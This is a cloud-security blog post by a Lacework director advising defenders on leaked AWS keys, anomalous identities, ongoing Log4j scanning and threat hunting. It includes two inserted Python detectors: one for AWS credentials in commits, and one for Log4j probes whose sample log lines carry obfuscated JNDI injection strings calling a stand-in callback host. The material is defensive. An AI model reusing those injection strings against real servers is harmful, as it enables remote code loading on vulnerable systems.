How can defenders catch security vulnerabilities before attackers do?

Security vulnerabilities are inevitable, and attackers and defenders are in a never-ending race to discover them first. As soon as we find a new attack technique, a bad actor is looking for the next one. Attackers are getting to your firm’s valuable assets faster thanks to new tools, automation, and more opportunities to move through your cloud environment unnoticed.

To protect the organisation’s most important data and systems, you will need to identify what bad actors want and how they try to get it. Based on the trends the Lacework Labs team discovered while conducting research for our Cloud Threat Report, we have a few tips to help you find security flaws before bad actors can take advantage of them.

How are attackers moving so fast?

Attackers are able to quickly breach your environment because they’re noticing your mistakes before you do. They’re constantly scanning your systems for misconfigurations and monitoring your repositories for hard-coded secrets. For instance, if a developer on your team accidentally commits an AWS access key in a public GitHub repository, even just for a few minutes, you might assume that it’s not a problem because you caught the error quickly.

But, this is exactly what attackers want—they only need a few minutes to obtain that key before you even know there is a problem. Access keys are long-term credentials that allow users to access your resources. If an attacker obtains them, they can access your network and data, which is how they take control of your systems, compromise employee data, or steal financial information. We’re noticing this trend gaining momentum with attackers.

They’re compromising systems at a rapid pace, which suggests that they’re using automation tools to scan new code commits in public repositories for those access keys. It’s a low-effort crime that enables them to quickly gain privileged access.
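The scan attackers run against public commits can be run by the defender first, at commit time. The following is an added example (not Lacework code) of a pre-commit style scanner over a constructed unified diff: it flags AWS access key IDs by their fixed prefix and length, and candidate secret access keys only when a secret-like variable name and a high-entropy 40-character value appear together, so a placeholder value does not trip it. The key values are AWS's documented example credentials, not live ones.

```python
import math
import re
from collections import Counter

# Constructed diff standing in for the added lines of a commit under review.
SAMPLE_DIFF = """\
--- a/config.env
+++ b/config.env
+AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+LEGACY_SECRET_KEY=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+DB_HOST=localhost
"""

# Long-term (AKIA) and temporary (ASIA) key IDs are 20 chars: prefix + 16 upper-case alphanumerics.
KEY_ID_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# Secret keys are 40 chars from the base64 alphabet; require a secret-like name on the
# same line so ordinary 40-character tokens (hashes, IDs) are not reported.
SECRET_RE = re.compile(r"(?i)secret[_\-]?(?:access[_\-]?)?key\W{0,5}([A-Za-z0-9/+=]{40})\b")

def shannon_entropy(s):
    """Bits per character; random key material scores well above repeated filler."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def redact(value):
    """Keep only the first and last four characters so findings are safe to log."""
    return value[:4] + "*" * (len(value) - 8) + value[-4:]

def find_aws_credentials(diff_text, min_entropy=4.0):
    """Scan only added lines of a unified diff; return (line_no, kind, redacted_value)."""
    findings = []
    for n, line in enumerate(diff_text.splitlines(), 1):
        if not line.startswith("+") or line.startswith("+++"):
            continue  # removed/context lines and the file header are not new leaks
        for m in KEY_ID_RE.finditer(line):
            findings.append((n, "aws_access_key_id", redact(m.group(0))))
        for m in SECRET_RE.finditer(line):
            secret = m.group(1)
            if shannon_entropy(secret) >= min_entropy:  # drops the all-'a' placeholder
                findings.append((n, "aws_secret_access_key", redact(secret)))
    return findings

if __name__ == "__main__":
    for line_no, kind, value in find_aws_credentials(SAMPLE_DIFF):
        print(f"line {line_no}: {kind} {value}")
```

A non-empty result is the signal to reject the commit and rotate the key, since the value is already in the developer's local history.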

Look for unusual behaviour, even from trusted users

As firms move much of their data and operations to the cloud, they also create increasingly more identities, both human and non-human. Human identities are people, for example, security analysts and developers, and non-human identities are apps or service accounts that make decisions on behalf of people. Non-human identities are a particularly attractive target for attackers because these accounts provide access to large amounts of sensitive data.

With the many identities in your firm’s cloud with different privilege levels, attackers can go undetected until they reach their targets. They appear to be authorised users because they’re using the credentials of someone at your firm, so unless abnormal behaviour is detected, they often aren’t noticed until they’ve found what they were looking for. Knowing what normal behaviour looks like will help you find users who are performing in unusual ways.

Avoid the distractions: New problems don’t erase old ones

As we continue to encounter new security issues, like the recent OpenSSL vulnerability, Log4j is no longer the primary concern. But attackers haven’t forgotten about Log4j, and they won’t for a while. We still see bad actors scanning for and exploiting the Log4j vulnerability, most of which is facilitated by out-of-band application security testing (OAST) tools.

OAST is a method used to discover known, exploitable vulnerabilities in web apps, and OAST tools make this process easier for attackers. We expect that attackers will use them to their advantage and look for unresolved Log4j vulnerabilities for months, maybe years, to come. Even if you weren’t originally impacted, it’s crucial to monitor this issue. As new vulnerabilities outshine these existing ones, attackers will try to take advantage of your distraction.
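Monitoring for continued Log4j scanning can be done from ordinary web server logs. This added example (not from the report or Lacework) runs a detector over constructed combined-format access-log lines: it URL-decodes each line, collapses the single-character lookup wrappers used to disguise the `jndi` keyword, and extracts the protocol and callback host, which for OAST-driven scanning is the out-of-band server the scanner is listening on. The log lines, IPs and `oast.example.net` host are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines; the first three are probes, the last two benign traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Nov/2022:08:15:02 +0000] "GET /?x=${jndi:ldap://oast.example.net/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Nov/2022:08:15:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:dns://oast.example.net/b}"
203.0.113.12 - - [10/Nov/2022:08:15:14 +0000] "GET /login?u=%24%7Bjndi%3Armi%3A%2F%2Foast.example.net%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.85.0"
198.51.100.5 - - [10/Nov/2022:08:16:00 +0000] "GET /docs/${version} HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.6 - - [10/Nov/2022:08:16:30 +0000] "POST /api/items HTTP/1.1" 201 40 "-" "python-requests/2.28"
"""

# Lookups such as ${lower:j}, ${upper:N} or ${::-d} evaluate to one literal character;
# replace each with that character so the keyword becomes visible. The lookahead keeps
# the jndi lookup itself intact.
WRAPPER_RE = re.compile(r"\$\{(?!jndi:)[^{}]*?[:\-]([^{}])\}", re.I)
# Once normalised: scheme and callback host of the lookup target.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.I)

def normalise(line):
    """URL-decode twice (double-encoded probes) and collapse wrappers until stable."""
    s = unquote(unquote(line))
    prev = None
    while prev != s:
        prev = s
        s = WRAPPER_RE.sub(r"\1", s)
    return s

def find_log4j_probes(log_text):
    """Return one dict per line carrying a JNDI lookup: source IP, scheme, callback host."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = JNDI_RE.search(normalise(line))
        if m:
            hits.append({"line": n, "src": line.split(" ", 1)[0],
                         "scheme": m.group(1).lower(), "callback": m.group(2)})
    return hits

if __name__ == "__main__":
    for hit in find_log4j_probes(SAMPLE_LOG):
        print(hit)
```

The callback hosts are the useful pivot: the same OAST domain recurring across sources is one scanner, and any outbound LDAP, RMI or DNS traffic from your hosts toward it means a lookup actually fired.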

Expect the unexpected: Techniques are ever changing

Attackers constantly refine and improve their techniques in an effort to outsmart defenders. Not only do they look for ways to exploit new tools and technologies, but they also try to find alternative and more impactful ways to attack popular, well-established software.

Linux, the most popular open-source operating system, is a prime target for bad actors as it is foundational to many businesses’ operations. The little information available about Linux malware makes it even easier for attackers to deploy it undetected.

Today, Linux malware is becoming more sophisticated. Our Labs team recently observed Linux malware using steganography techniques, which is a method cyber-attackers use to hide information in a seemingly ordinary medium like an image. Another instance where we saw improved attack techniques was CVE-2022-26134, a widely exploited zero-day vulnerability in Atlassian’s Confluence Server and Data Center products.

While Atlassian is a popular target for attackers, this exploit was notable because it was much more impactful than previous vulnerabilities within the platform. We are continuing to see a substantial increase in malware and the scope of attacks within Atlassian, and we can likely expect the scale to continue to increase as attackers improve their abilities.

Gather and explore data to see what’s happening

To stay ahead of attackers, you need to look at your environment from a risk-based perspective. What does your business prioritise? That’s what attackers want to find—the data and systems that keep your firm running. What’s important to you is a target for them.

Knowing which assets cyber-attackers might try to compromise or target and understanding their techniques can help you identify their attack paths. While patching all vulnerabilities would be ideal, it’s just not possible. Understanding where vulnerabilities are and fixing the most critical ones can keep bad actors away from the assets you need the most.

The key to prioritising those vulnerabilities is data. When you have high-quality data from your environment, you can contextualise abnormal events faster and more accurately.

Use technology to your advantage

Technology can help you collect and analyse data faster. But to do so, you need to use the right tools for the right tasks. Automation should replace repetitive work, like scanning logs for certain IP addresses. Machine learning can help identify and prioritise anomalous behaviour. Visualisation tools can help you sort and understand large data sets. Regardless of how advanced a tool is, it won’t be accurate or helpful without sufficient data.

The Lacework team developed an open-source tool, Cloud-Hunter, to help us find threats within the Lacework Polygraph Data Platform. Lacework Query Language (LQL) is our custom programming language that we use to search and retrieve the data that Lacework gathers from our users’ cloud environments. Prior to developing Cloud-Hunter, we used LQL in combination with another platform to create new policies and produce alerts.

As we spent more time threat hunting, we decided to create a tool to simplify queries and make hunting easier, which is why we developed Cloud-Hunter. While we originally used it only among the Lacework Labs team, we realised that our customers could benefit from the tool as well. With Cloud-Hunter, you can explore data in your environment, validate assumptions, respond to incidents, and create custom policies unique to your environment.

Learn more about attackers’ tactics

It’s not easy to find security vulnerabilities, but understanding attack techniques and what’s going on in your environment can make protecting your organisation’s assets much easier. To learn more about Cloud-Hunter, how it can help you, and to understand the tactics attackers are using and how to protect your business, read our most recent Cloud Threat Report.

Richard Davies is the Area Director for Australia and New Zealand at Lacework.